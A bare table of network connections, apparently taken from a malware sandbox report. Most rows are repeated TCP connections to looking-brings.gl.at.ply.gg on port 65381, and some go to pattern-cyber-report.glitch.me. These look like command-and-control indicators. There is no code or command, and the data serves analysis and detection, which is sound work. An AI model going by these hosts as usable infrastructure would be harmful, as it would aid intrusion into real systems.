| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:51141 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51190 | tcp | |
| N/A | 127.0.0.1:51202 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:51230 | tcp | |
| N/A | 127.0.0.1:51244 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51273 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51276 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:51315 | tcp | |
| N/A | 127.0.0.1:51318 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51348 | tcp | |
| N/A | 127.0.0.1:51350 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 95.100.153.139:443 | www.bing.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51373 | tcp | |
| N/A | 127.0.0.1:51385 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51393 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 13.107.6.158:80 | edge-http.microsoft.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51414 | tcp | |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51418 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51439 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51458 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51472 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51499 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51511 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51531 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51543 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51559 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51562 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:51584 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51596 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:51599 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:51631 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51634 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:51646 | tcp | |
| N/A | 127.0.0.1:51658 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51680 | tcp | |
| N/A | 127.0.0.1:51683 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| N/A | 127.0.0.1:51707 | tcp | |
| N/A | 127.0.0.1:51721 | tcp | |
| N/A | 127.0.0.1:51738 | tcp | |
| N/A | 127.0.0.1:51742 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51767 | tcp | |
| N/A | 127.0.0.1:51782 | tcp | |
| N/A | 127.0.0.1:51789 | tcp | |
| N/A | 127.0.0.1:51827 | tcp | |
| N/A | 127.0.0.1:51846 | tcp | |
| N/A | 127.0.0.1:51858 | tcp | |
| N/A | 127.0.0.1:51870 | tcp | |
| N/A | 127.0.0.1:51883 | tcp | |
| N/A | 127.0.0.1:51897 | tcp | |
| N/A | 127.0.0.1:51910 | tcp | |
| N/A | 127.0.0.1:51922 | tcp | |
| N/A | 127.0.0.1:51935 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51938 | tcp | |
| N/A | 127.0.0.1:51966 | tcp | |
| N/A | 127.0.0.1:51978 | tcp | |
| N/A | 127.0.0.1:51988 | tcp | |
| N/A | 127.0.0.1:52014 | tcp | |
| N/A | 127.0.0.1:52028 | tcp | |
| N/A | 127.0.0.1:52049 | tcp | |
| N/A | 127.0.0.1:52065 | tcp | |
| N/A | 127.0.0.1:52073 | tcp | |
| N/A | 127.0.0.1:52100 | tcp | |
| N/A | 127.0.0.1:52122 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52139 | tcp | |
| N/A | 127.0.0.1:52154 | tcp | |
| N/A | 127.0.0.1:52171 | tcp | |
| N/A | 127.0.0.1:52196 | tcp | |
| N/A | 127.0.0.1:52210 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52220 | tcp | |
| N/A | 127.0.0.1:52245 | tcp | |
| N/A | 127.0.0.1:52262 | tcp | |
| N/A | 127.0.0.1:52276 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52286 | tcp | |
| N/A | 127.0.0.1:52311 | tcp | |
| N/A | 127.0.0.1:52333 | tcp | |
| N/A | 127.0.0.1:52350 | tcp | |
| N/A | 127.0.0.1:52371 | tcp | |
| N/A | 127.0.0.1:52388 | tcp | |
| N/A | 127.0.0.1:52406 | tcp | |
| N/A | 127.0.0.1:52418 | tcp | |
| N/A | 127.0.0.1:52442 | tcp | |
| N/A | 127.0.0.1:52465 | tcp | |
| N/A | 127.0.0.1:52482 | tcp | |
| N/A | 127.0.0.1:52502 | tcp | |
| N/A | 127.0.0.1:52528 | tcp | |
| N/A | 127.0.0.1:52561 | tcp | |
| N/A | 127.0.0.1:52575 | tcp | |
| N/A | 127.0.0.1:52612 | tcp | |
| N/A | 127.0.0.1:52633 | tcp | |
| N/A | 127.0.0.1:52654 | tcp | |
| N/A | 127.0.0.1:52675 | tcp | |
| N/A | 127.0.0.1:52703 | tcp | |
| N/A | 127.0.0.1:52726 | tcp | |
| N/A | 127.0.0.1:52747 | tcp | |
| N/A | 127.0.0.1:52751 | tcp | |
| N/A | 127.0.0.1:52778 | tcp | |
| N/A | 127.0.0.1:52795 | tcp | |
| N/A | 127.0.0.1:52810 | tcp | |
| N/A | 127.0.0.1:52825 | tcp | |
| N/A | 127.0.0.1:52849 | tcp | |
| N/A | 127.0.0.1:52866 | tcp | |
| N/A | 127.0.0.1:52883 | tcp | |
| N/A | 127.0.0.1:52923 | tcp | |
| N/A | 127.0.0.1:52954 | tcp | |
| N/A | 127.0.0.1:52978 | tcp | |
| N/A | 127.0.0.1:52997 | tcp | |
| N/A | 127.0.0.1:53012 | tcp | |
| N/A | 127.0.0.1:53032 | tcp | |
| N/A | 127.0.0.1:53047 | tcp | |
| N/A | 127.0.0.1:53068 | tcp | |
| N/A | 127.0.0.1:53087 | tcp | |
| N/A | 127.0.0.1:53106 | tcp | |
| N/A | 127.0.0.1:53128 | tcp | |
| N/A | 127.0.0.1:53143 | tcp | |
| N/A | 127.0.0.1:53162 | tcp | |
| N/A | 127.0.0.1:53182 | tcp | |
| N/A | 127.0.0.1:53196 | tcp | |
| N/A | 127.0.0.1:53204 | tcp | |
| N/A | 127.0.0.1:53236 | tcp | |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 127.0.0.1:53255 | tcp | |
| N/A | 127.0.0.1:53276 | tcp | |
| N/A | 127.0.0.1:53304 | tcp | |
| N/A | 127.0.0.1:53351 | tcp | |
| N/A | 127.0.0.1:53366 | tcp | |
| N/A | 127.0.0.1:53387 | tcp | |
| N/A | 127.0.0.1:53402 | tcp | |
| N/A | 127.0.0.1:53419 | tcp | |
| N/A | 127.0.0.1:53436 | tcp | |
| N/A | 127.0.0.1:53453 | tcp | |
| N/A | 127.0.0.1:53473 | tcp | |
| N/A | 127.0.0.1:53488 | tcp | |
| N/A | 127.0.0.1:53505 | tcp | |
| N/A | 127.0.0.1:53519 | tcp | |
| N/A | 127.0.0.1:53549 | tcp | |
| N/A | 127.0.0.1:53564 | tcp | |
| N/A | 127.0.0.1:53595 | tcp | |
| N/A | 127.0.0.1:53607 | tcp | |
| N/A | 127.0.0.1:53637 | tcp | |
| N/A | 127.0.0.1:53654 | tcp | |
| N/A | 127.0.0.1:53669 | tcp | |
| N/A | 127.0.0.1:53682 | tcp | |
| N/A | 127.0.0.1:53696 | tcp | |
| N/A | 127.0.0.1:53715 | tcp | |
| N/A | 127.0.0.1:53729 | tcp | |
| N/A | 127.0.0.1:53745 | tcp | |
| N/A | 127.0.0.1:53763 | tcp | |
| N/A | 127.0.0.1:53778 | tcp | |
| N/A | 127.0.0.1:53796 | tcp | |
| N/A | 127.0.0.1:53822 | tcp | |
| N/A | 127.0.0.1:53839 | tcp | |
| N/A | 127.0.0.1:53859 | tcp | |
| N/A | 127.0.0.1:53874 | tcp | |
| N/A | 127.0.0.1:53878 | tcp | |
| N/A | 127.0.0.1:53906 | tcp | |
| N/A | 127.0.0.1:53920 | tcp | |
| N/A | 127.0.0.1:53935 | tcp | |
| N/A | 127.0.0.1:53950 | tcp | |
| N/A | 127.0.0.1:53955 | tcp | |
| N/A | 127.0.0.1:53982 | tcp | |
| N/A | 127.0.0.1:53988 | tcp | |
| N/A | 127.0.0.1:54016 | tcp | |
| N/A | 127.0.0.1:54040 | tcp | |
| N/A | 127.0.0.1:54043 | tcp | |
| N/A | 127.0.0.1:54069 | tcp | |
| N/A | 127.0.0.1:54086 | tcp | |
| N/A | 127.0.0.1:54090 | tcp | |
| N/A | 127.0.0.1:54115 | tcp | |
| N/A | 127.0.0.1:54129 | tcp | |
| N/A | 127.0.0.1:54146 | tcp | |
| N/A | 127.0.0.1:54148 | tcp | |
| N/A | 127.0.0.1:54155 | tcp | |
| N/A | 127.0.0.1:54158 | tcp | |
| N/A | 127.0.0.1:54166 | tcp | |
| N/A | 127.0.0.1:54169 | tcp | |
| N/A | 127.0.0.1:54173 | tcp | |
| N/A | 127.0.0.1:54177 | tcp | |
| N/A | 127.0.0.1:54180 | tcp | |
| N/A | 127.0.0.1:54207 | tcp | |
| N/A | 127.0.0.1:54211 | tcp | |
| N/A | 127.0.0.1:54298 | tcp | |
| N/A | 127.0.0.1:54311 | tcp | |
| N/A | 127.0.0.1:54352 | tcp | |
| N/A | 127.0.0.1:54356 | tcp | |
| N/A | 127.0.0.1:54396 | tcp | |
| N/A | 127.0.0.1:54408 | tcp | |
| N/A | 127.0.0.1:54412 | tcp | |
| N/A | 127.0.0.1:54425 | tcp | |
| N/A | 127.0.0.1:54448 | tcp | |
| N/A | 127.0.0.1:54461 | tcp | |
| N/A | 127.0.0.1:54464 | tcp | |
| N/A | 127.0.0.1:54486 | tcp | |
| N/A | 127.0.0.1:54489 | tcp | |
| N/A | 127.0.0.1:54510 | tcp | |
| N/A | 127.0.0.1:54514 | tcp | |
| N/A | 127.0.0.1:54526 | tcp | |
| N/A | 127.0.0.1:54538 | tcp | |
| N/A | 127.0.0.1:54560 | tcp | |
| N/A | 127.0.0.1:54563 | tcp | |
| N/A | 127.0.0.1:54575 | tcp | |
| N/A | 127.0.0.1:54588 | tcp | |
| N/A | 127.0.0.1:54600 | tcp | |
| N/A | 127.0.0.1:54612 | tcp | |
| N/A | 127.0.0.1:54625 | tcp | |
| N/A | 127.0.0.1:54637 | tcp | |
| N/A | 127.0.0.1:54649 | tcp | |
| N/A | 127.0.0.1:54670 | tcp | |
| N/A | 127.0.0.1:54682 | tcp | |
| N/A | 127.0.0.1:54685 | tcp | |
| N/A | 127.0.0.1:54698 | tcp | |
| N/A | 127.0.0.1:54710 | tcp | |
| N/A | 127.0.0.1:54722 | tcp | |
| N/A | 127.0.0.1:54735 | tcp | |
| N/A | 127.0.0.1:54747 | tcp | |
| N/A | 127.0.0.1:54768 | tcp | |
| N/A | 127.0.0.1:54772 | tcp | |
| N/A | 127.0.0.1:54784 | tcp | |
| N/A | 127.0.0.1:54796 | tcp | |
| N/A | 127.0.0.1:54808 | tcp | |
| N/A | 127.0.0.1:54829 | tcp | |
| N/A | 127.0.0.1:54833 | tcp | |
| N/A | 127.0.0.1:54845 | tcp | |
| N/A | 127.0.0.1:54858 | tcp | |
| N/A | 127.0.0.1:54870 | tcp | |
| N/A | 127.0.0.1:54882 | tcp | |
| N/A | 127.0.0.1:54895 | tcp | |
| N/A | 127.0.0.1:54907 | tcp | |
| N/A | 127.0.0.1:54926 | tcp | |
| N/A | 127.0.0.1:54938 | tcp | |
| N/A | 127.0.0.1:54970 | tcp | |
| N/A | 127.0.0.1:54983 | tcp | |
| N/A | 127.0.0.1:54996 | tcp | |
| N/A | 127.0.0.1:54999 | tcp | |
| N/A | 127.0.0.1:55013 | tcp | |
| N/A | 127.0.0.1:55040 | tcp | |
| N/A | 127.0.0.1:55053 | tcp | |
| N/A | 127.0.0.1:55066 | tcp | |
| N/A | 127.0.0.1:55079 | tcp | |
| N/A | 127.0.0.1:55098 | tcp | |
| N/A | 127.0.0.1:55111 | tcp | |
| N/A | 127.0.0.1:55125 | tcp | |
| N/A | 127.0.0.1:55148 | tcp | |
| N/A | 127.0.0.1:55160 | tcp | |
| N/A | 127.0.0.1:55173 | tcp | |
| N/A | 127.0.0.1:55177 | tcp | |
| N/A | 127.0.0.1:55198 | tcp | |
| N/A | 127.0.0.1:55211 | tcp | |
| N/A | 127.0.0.1:55224 | tcp | |
| N/A | 127.0.0.1:55237 | tcp | |
| N/A | 127.0.0.1:55251 | tcp | |
| N/A | 127.0.0.1:55263 | tcp | |
| N/A | 127.0.0.1:55277 | tcp | |
| N/A | 127.0.0.1:55289 | tcp | |
| N/A | 127.0.0.1:55302 | tcp | |
| N/A | 127.0.0.1:55315 | tcp | |
| N/A | 127.0.0.1:55329 | tcp | |
| N/A | 127.0.0.1:55342 | tcp | |
| N/A | 127.0.0.1:55356 | tcp | |
| N/A | 127.0.0.1:55368 | tcp | |
| N/A | 127.0.0.1:55381 | tcp | |
| N/A | 127.0.0.1:55407 | tcp | |
| N/A | 127.0.0.1:55420 | tcp | |
| N/A | 127.0.0.1:55433 | tcp | |
| N/A | 127.0.0.1:55446 | tcp | |
| N/A | 127.0.0.1:55459 | tcp | |
| N/A | 127.0.0.1:55484 | tcp | |
| N/A | 127.0.0.1:55487 | tcp | |
| N/A | 127.0.0.1:55503 | tcp | |
| N/A | 127.0.0.1:55515 | tcp | |
| N/A | 127.0.0.1:55529 | tcp | |
| N/A | 127.0.0.1:55542 | tcp | |
| N/A | 127.0.0.1:55556 | tcp | |
| N/A | 127.0.0.1:55580 | tcp | |
| N/A | 127.0.0.1:55594 | tcp | |
| N/A | 127.0.0.1:55607 | tcp | |
| N/A | 127.0.0.1:55620 | tcp | |
| N/A | 127.0.0.1:55633 | tcp | |
| N/A | 127.0.0.1:55646 | tcp | |
| N/A | 127.0.0.1:55650 | tcp | |
| N/A | 127.0.0.1:55673 | tcp | |
| N/A | 127.0.0.1:55686 | tcp | |
| N/A | 127.0.0.1:55699 | tcp | |
| N/A | 127.0.0.1:55713 | tcp | |
| N/A | 127.0.0.1:55726 | tcp | |
| N/A | 127.0.0.1:55740 | tcp | |
| N/A | 127.0.0.1:55754 | tcp | |
| N/A | 127.0.0.1:55777 | tcp | |
| N/A | 127.0.0.1:55792 | tcp | |
| N/A | 127.0.0.1:55805 | tcp | |
| N/A | 127.0.0.1:55819 | tcp | |
| N/A | 127.0.0.1:55832 | tcp | |
| N/A | 127.0.0.1:55847 | tcp | |
| N/A | 127.0.0.1:55860 | tcp | |
| N/A | 127.0.0.1:55872 | tcp | |
| N/A | 127.0.0.1:55886 | tcp | |
| N/A | 127.0.0.1:55899 | tcp | |
| N/A | 127.0.0.1:55914 | tcp | |
| N/A | 127.0.0.1:55933 | tcp | |
| N/A | 127.0.0.1:55956 | tcp | |
| N/A | 127.0.0.1:55969 | tcp | |
| N/A | 127.0.0.1:55983 | tcp | |
| N/A | 127.0.0.1:55996 | tcp | |
| N/A | 127.0.0.1:56011 | tcp | |
| N/A | 127.0.0.1:56027 | tcp | |
| N/A | 127.0.0.1:56030 | tcp | |
| N/A | 127.0.0.1:56054 | tcp | |
| N/A | 127.0.0.1:56067 | tcp | |
| N/A | 127.0.0.1:56080 | tcp | |
| N/A | 127.0.0.1:56117 | tcp | |
| N/A | 127.0.0.1:56130 | tcp | |
| N/A | 127.0.0.1:56143 | tcp | |
| N/A | 127.0.0.1:56147 | tcp | |
| N/A | 127.0.0.1:56172 | tcp | |
| N/A | 127.0.0.1:56184 | tcp | |
| N/A | 127.0.0.1:56198 | tcp | |
| N/A | 127.0.0.1:56212 | tcp | |
| N/A | 127.0.0.1:56226 | tcp | |
| N/A | 127.0.0.1:56230 | tcp | |
| N/A | 127.0.0.1:56256 | tcp | |
| N/A | 127.0.0.1:56279 | tcp | |
| N/A | 127.0.0.1:56292 | tcp | |
| N/A | 127.0.0.1:56305 | tcp | |
| N/A | 127.0.0.1:56319 | tcp | |
| N/A | 127.0.0.1:56333 | tcp | |
| N/A | 127.0.0.1:56346 | tcp | |
| N/A | 127.0.0.1:56360 | tcp | |
| N/A | 127.0.0.1:56373 | tcp | |
| N/A | 127.0.0.1:56386 | tcp | |
| N/A | 127.0.0.1:56392 | tcp | |
| N/A | 127.0.0.1:56396 | tcp | |
| N/A | 127.0.0.1:56401 | tcp | |
| N/A | 127.0.0.1:56405 | tcp | |
| N/A | 127.0.0.1:56410 | tcp | |
| N/A | 127.0.0.1:56414 | tcp | |
| N/A | 127.0.0.1:56420 | tcp | |
| N/A | 127.0.0.1:56424 | tcp | |
| N/A | 127.0.0.1:56518 | tcp | |
| N/A | 127.0.0.1:56531 | tcp | |
| N/A | 127.0.0.1:56535 | tcp | |
| N/A | 127.0.0.1:56558 | tcp | |
| N/A | 127.0.0.1:56580 | tcp | |
| N/A | 127.0.0.1:56594 | tcp | |
| N/A | 127.0.0.1:56607 | tcp | |
| N/A | 127.0.0.1:56621 | tcp | |
| N/A | 127.0.0.1:56636 | tcp | |
| N/A | 127.0.0.1:56650 | tcp | |
| N/A | 127.0.0.1:56663 | tcp | |
| N/A | 127.0.0.1:56677 | tcp | |
| N/A | 127.0.0.1:56680 | tcp | |
| N/A | 127.0.0.1:56701 | tcp | |
| N/A | 127.0.0.1:56716 | tcp | |
| N/A | 127.0.0.1:56739 | tcp | |
| N/A | 127.0.0.1:56753 | tcp | |
| N/A | 127.0.0.1:56774 | tcp | |
| N/A | 127.0.0.1:56791 | tcp | |
| N/A | 127.0.0.1:56805 | tcp | |
| N/A | 127.0.0.1:56820 | tcp | |
| N/A | 127.0.0.1:56841 | tcp | |
| N/A | 127.0.0.1:56858 | tcp | |
| N/A | 127.0.0.1:56871 | tcp | |
| N/A | 127.0.0.1:56885 | tcp | |
| N/A | 127.0.0.1:56899 | tcp | |
| N/A | 127.0.0.1:56913 | tcp | |
| N/A | 127.0.0.1:56928 | tcp | |
| N/A | 127.0.0.1:56950 | tcp | |
| N/A | 127.0.0.1:56964 | tcp | |
| N/A | 127.0.0.1:56968 | tcp | |
| N/A | 127.0.0.1:56993 | tcp | |
| N/A | 127.0.0.1:57006 | tcp | |
| N/A | 127.0.0.1:57014 | tcp | |
| N/A | 127.0.0.1:57035 | tcp | |
| N/A | 127.0.0.1:57051 | tcp | |
| N/A | 127.0.0.1:57076 | tcp | |
| N/A | 127.0.0.1:57089 | tcp | |
| N/A | 127.0.0.1:57093 | tcp | |
| N/A | 127.0.0.1:57145 | tcp | |
| N/A | 127.0.0.1:57147 | tcp | |
| N/A | 127.0.0.1:57182 | tcp | |
| N/A | 127.0.0.1:57185 | tcp | |
| N/A | 127.0.0.1:57210 | tcp | |
| N/A | 127.0.0.1:57214 | tcp | |
| N/A | 127.0.0.1:57237 | tcp | |
| N/A | 127.0.0.1:57241 | tcp | |
| N/A | 127.0.0.1:57269 | tcp | |
| N/A | 127.0.0.1:57274 | tcp | |
| N/A | 127.0.0.1:57309 | tcp | |
| N/A | 127.0.0.1:57312 | tcp | |
